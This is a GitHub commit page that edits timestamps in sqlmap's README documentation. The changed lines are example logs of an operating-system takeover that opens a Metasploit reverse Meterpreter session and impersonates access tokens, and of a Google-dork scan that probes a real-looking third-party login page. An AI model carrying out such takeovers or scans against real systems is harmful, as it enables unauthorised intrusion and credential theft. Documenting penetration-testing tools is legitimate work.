Skip to content

Commit 071e897

Browse files
committed
minor time adjustments
1 parent 6fd1f7f commit 071e897

File tree

1 file changed

+20
-20
lines changed

1 file changed

+20
-20
lines changed

doc/README.sgml

Lines changed: 20 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -4852,19 +4852,19 @@ argument so that it will be started as SYSTEM? [Y/n] y
48524852
chunks, upload them and recreate the original file out of the binary chunks server-side,
48534853
wait..
48544854
[hh:mm:22] [INFO] file chunk 1 written
4855-
[14:10:06] [INFO] file chunk 2 written
4856-
[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
4855+
[hh:mm:06] [INFO] file chunk 2 written
4856+
[hh:mm:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
48574857
[*] Please wait while we load the module tree...
48584858
[*] Handler binding to LHOST 0.0.0.0
48594859
[*] Started reverse handler
48604860
[*] Starting the payload handler...
4861-
[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
4861+
[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
48624862
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
48634863
[*] Sending stage (718336 bytes)
48644864
[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
48654865

48664866
meterpreter >
4867-
[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of
4867+
[hh:mm:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of
48684868
Access Tokens availables. Choose which user you want to impersonate by using incognito's
48694869
command 'impersonate_token'
48704870
Loading extension priv...success.
@@ -5404,26 +5404,26 @@ and resulting page set to 3:
54045404
<tscreen><verb>
54055405
$ python sqlmap.py -g "login ext:php" --gpage=3 -v 1
54065406

5407-
[14:11:12] [INFO] first request to Google to get the session cookie
5408-
[14:11:12] [INFO] using search result page #3
5409-
[14:11:12] [INFO] sqlmap got 100 results for your Google dork expression, 5 of them are testable targets
5410-
[14:11:12] [INFO] sqlmap got a total of 5 targets
5407+
[hh:mm:12] [INFO] first request to Google to get the session cookie
5408+
[hh:mm:12] [INFO] using search result page #3
5409+
[hh:mm:12] [INFO] sqlmap got 100 results for your Google dork expression, 5 of them are testable targets
5410+
[hh:mm:12] [INFO] sqlmap got a total of 5 targets
54115411
url 1:
54125412
GET http://myjobstreet-beta.jobstreet.com/home/login.php?site=in
54135413
do you want to test this url? [Y/n/q]
54145414
>
5415-
[14:11:14] [INFO] testing url http://myjobstreet-beta.jobstreet.com/home/login.php?site=in
5416-
[14:11:14] [INFO] using '/home/stamparm/Work/sqlmap/sqlmap/output/None/session' as session file
5417-
[14:11:14] [INFO] testing connection to the target url
5418-
[14:11:15] [INFO] testing if the url is stable, wait a few seconds
5419-
[14:11:19] [INFO] url is stable
5420-
[14:11:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
5421-
[14:11:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
5422-
[14:11:21] [INFO] testing if Cookie parameter 'REFERP' is dynamic
5423-
[14:11:22] [WARNING] Cookie parameter 'REFERP' is not dynamic
5424-
[14:11:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
5425-
[14:11:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
5426-
[14:11:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
5415+
[hh:mm:14] [INFO] testing url http://myjobstreet-beta.jobstreet.com/home/login.php?site=in
5416+
[hh:mm:14] [INFO] using '/home/stamparm/Work/sqlmap/sqlmap/output/None/session' as session file
5417+
[hh:mm:14] [INFO] testing connection to the target url
5418+
[hh:mm:15] [INFO] testing if the url is stable, wait a few seconds
5419+
[hh:mm:19] [INFO] url is stable
5420+
[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
5421+
[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
5422+
[hh:mm:21] [INFO] testing if Cookie parameter 'REFERP' is dynamic
5423+
[hh:mm:22] [WARNING] Cookie parameter 'REFERP' is not dynamic
5424+
[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
5425+
[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
5426+
[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
54275427
[...]
54285428
</verb></tscreen>
54295429

0 commit comments

Comments
 (0)